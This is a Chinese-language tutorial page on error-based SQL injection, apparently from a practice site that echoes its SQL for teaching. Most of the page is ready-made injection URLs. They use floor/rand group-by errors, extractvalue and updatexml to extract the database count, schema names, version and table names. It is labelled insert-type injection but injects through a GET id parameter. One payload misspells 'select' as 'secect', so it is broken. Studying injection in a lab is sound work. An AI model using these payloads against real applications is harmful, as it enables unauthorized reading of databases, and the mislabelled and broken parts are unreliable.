select * from article where id = 6

(调试信息,此颜色区域只为输出sql语句,让您更好的理解sql注入,正常网站不会在页面显示)

insert型SQL注入
时间:2018-05-07 10:47:31
热度: 0
insert 型注入,有一个前提条件,就是执行sql语句的时候,
要加上mysqli_error()函数
如下:
$result = mysqli_query($conn,$sql) or die(mysqli_error($conn));
练习地址:左侧导航栏最下方,
http://xss.tv/sql-article/addarticle.php
爆出注入函数
获取有多少个数据库
http://xss.tv/sql-article/showarticle.php?id=1319' and (select 1 from(select count(*),concat((select (select (select concat(0x7e,count(schema_name),0x7e) from information_schema.schemata)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- -

通过limit 获取所有数据库名
http://xss.tv/sql-article/showarticle.php?id=1319' and (select 1 from(select count(*),concat((select (select (select concat(0x7e, schema_name, 0x7e) from information_schema.schemata limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) -- -
2、通过ExtractValue报错
and extractvalue(1, payload)
http://xss.tv/sql-article/showarticle.php?id=1319' and extractvalue(1, concat(0x7e,(select @@version),0x7e)) and updatexml(1,concat(0x23,(select table_name from information_schema.tables where table_schema='newblog' limit 0,1),0x23),1)-- -
-- -
3、通过UpdateXML报错
+and updatexml(1,payload,1)
http://xss.tv/sql-article/showarticle.php?id=1319' and updatexml(1, concat(0x7e,(secect @@version),0x7e),1)-- -